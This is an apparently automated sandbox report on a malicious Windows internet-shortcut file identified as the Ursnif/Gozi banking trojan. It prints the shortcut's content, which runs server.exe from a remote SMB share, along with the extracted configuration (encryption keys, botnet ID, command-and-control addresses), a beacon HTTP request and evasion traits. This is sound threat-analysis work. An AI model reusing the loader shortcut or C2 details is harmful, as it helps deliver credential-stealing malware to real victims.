Windows Analysis Report
marzo.txt.url

Overview

General Information

Sample Name: marzo.txt.url
Analysis ID: 826967
MD5: d8dc17b22192b297073d5749a7b49966
SHA1: 606fd516fb85a0fbaa3a2b7ea92feffd5ae41b99
SHA256: f7b7f524138f10ad3b0d8145997db4ee5c90e7d8f76281cfc4a32bc427833236

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found malicious URL file
Writes registry values via WMI
Opens network shares
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Creates a window with clipboard capturing capabilities
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Source: 00000003.00000003.1591519881.0000000002B70000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif
  {
    "RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=",
    "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"],
    "botnet": "7714",
    "server": "50",
    "serpent_key": "lk8hY4nisKQzZKXE",
    "sleep_time": "1",
    "CONF_TIMEOUT": "20",
    "SetWaitableTimer_value": "0"
  }
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_02BE1508

Networking

Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 5.44.43.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 5.44.43.17:80
Source: Joe Sandbox View ASN Name: MGNHOST-ASRU
Source: Joe Sandbox View IP Address: 192.229.221.95
Source: global traffic HTTP traffic detected:
  GET /drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8VWt8GQ/Zc6hXPYvHVnVEinmxGwG/FbxcbjsVVBkkkF087h8/0Bw_2FBX6oYzh4Vz7I7V6u/xxtFlXc0f1lZa/ReLwGc75/TgOyVXs_2BG_2Ff5dq8IUPJ/_2B5Dzbadz/pCrKzEKZvmMD7pEh0/5p7osKVJqMAc/da4zdGlXLsX/CQJtG1bn92QsJL/_2BNPELQUnUqT0_2B_2B2/nFFFAPeD9EV0WvEI/yBuQ4L9zF/_2Bt.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 5.44.43.17
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown DNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 5.44.43.17
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/b2c5-fe065076e0a1
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/drew/ZSasVN0fLMcptc05TEVCa/mWgPW7Eo_2Fhz8Y6/Fz7ovUnPPN6ieZv/4FY_2FkRwgHKarRxmu/cK8
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://5.44.43.17/~
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checklist.skype.com/drew/XaKJ910OZ6OkzOiEp1j_2/BGdUIBHp_2FM8Z2X/fEGunvRWGFrRGJ9/FM827N5CFAo37
Source: server.exe, 00000005.00000002.2850719337.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checklist.skype.com/drew/p8a6EJ5vt4U/NrIUl_2BZrXy6_/2BoMtuVkg7FYSQnXs7vFZ/T_2BtMhNb_2F_2Bq/Vr
Source: unknown DNS traffic detected: queries for: checklist.skype.com

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_02B81508
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_02BE1508

System Summary

Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: marzo.txt.url Initial sample:
  [InternetShortcut]
  IconIndex=70
  HotKey=0
  IDList=
  URL=file://46.8.19.120/Agenzia/server.exe
  IconFile=C:\Windows\system32\SHELL32.dll
  [{000214A0-0000-0000-C000-000000000046}]
  Prop3=19,9
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: marzo.txt.url, type: SAMPLE Matched rule: Methodology_Suspicious_Shortcut_SMB_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects remote SMB path for .URL persistence, score = 27.09.2019, sample = e0bef7497fcb284edb0c65b59d511830, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000002.2850616986.0000000002C51000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2850703923.0000000002D4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.2849985060.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B816DF 3_2_02B816DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B81D8A 3_2_02B81D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8832C 3_2_02B8832C
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE16DF 5_2_02BE16DF
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE1D8A 5_2_02BE1D8A
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE832C 5_2_02BE832C
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_02B8421F
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B88551 NtQueryVirtualMemory, 3_2_02B88551
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_02BE421F
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Section loaded: msvcr100.dll
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: \Device\Mup\46.8.19.120\Agenzia\server.exe "\\46.8.19.120\Agenzia\server.exe"
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Feedback
Source: classification engine Classification label: mal88.troj.spyw.evad.winURL@2/3@2/2
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B830D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_02B830D5
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation

Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Unpacked PE file: 3.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B87F30 push ecx; ret 3_2_02B87F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8831B push ecx; ret 3_2_02B8832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D54EDB push 8B8751D0h; retf 3_2_02D54EE0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D5A167 push edi; ret 3_2_02D5A168
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D4FC2D pushad ; ret 3_2_02D4FC81
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE7F30 push ecx; ret 5_2_02BE7F39
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02BE831B push ecx; ret 5_2_02BE832B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C59883 push 8B8751D0h; retf 5_2_02C59888
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C545D5 pushad ; ret 5_2_02C54629
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C5EB0F push edi; ret 5_2_02C5EB10

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Process information set: NOOPENFILEERRORBOX
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 75 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 313 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 268 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6632 Thread sleep count: 36 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 40 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 472 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 47 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 97 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 39 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 40 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 601 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe TID: 6852 Thread sleep count: 210 > 30
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Window / User API: threadDelayed 472
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Window / User API: threadDelayed 601
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\System32 FullSizeInformation
Source: server.exe, 00000003.00000002.2850791743.0000000002D87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX7
Source: server.exe, 00000003.00000002.2850791743.0000000002DA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: server.exe, 00000003.00000002.2850791743.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: server.exe, 00000005.00000002.2850719337.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B60D90 mov eax, dword ptr fs:[00000030h] 3_2_02B60D90
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B6092B mov eax, dword ptr fs:[00000030h] 3_2_02B6092B
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02D523B0 push dword ptr fs:[00000030h] 3_2_02D523B0
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 5_2_02C56D58 push dword ptr fs:[00000030h] 5_2_02C56D58
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B83BD3 cpuid 3_2_02B83BD3
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B8213E SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep, 3_2_02B8213E
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B854D8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 3_2_02B854D8
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe Code function: 3_2_02B83BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_02B83BD3

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\server.exe
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\SystemResources\server.exe.mun
Source: \Device\Mup\46.8.19.120\Agenzia\server.exe File opened: \\46.8.19.120\Agenzia\

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.2851808327.0000000005458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2478797463.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2851937676.0000000005588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6832, type: MEMORYSTR